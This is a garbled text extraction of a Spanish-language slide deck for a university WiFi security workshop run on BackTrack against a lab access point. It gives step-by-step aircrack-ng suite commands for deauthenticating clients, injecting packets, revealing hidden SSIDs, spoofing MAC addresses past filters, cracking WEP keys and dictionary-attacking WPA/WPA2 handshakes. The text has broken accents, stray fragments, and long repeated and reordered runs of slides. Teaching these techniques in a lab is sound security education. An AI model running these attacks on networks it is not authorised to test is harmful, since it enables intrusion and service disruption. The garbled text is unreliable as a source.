bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
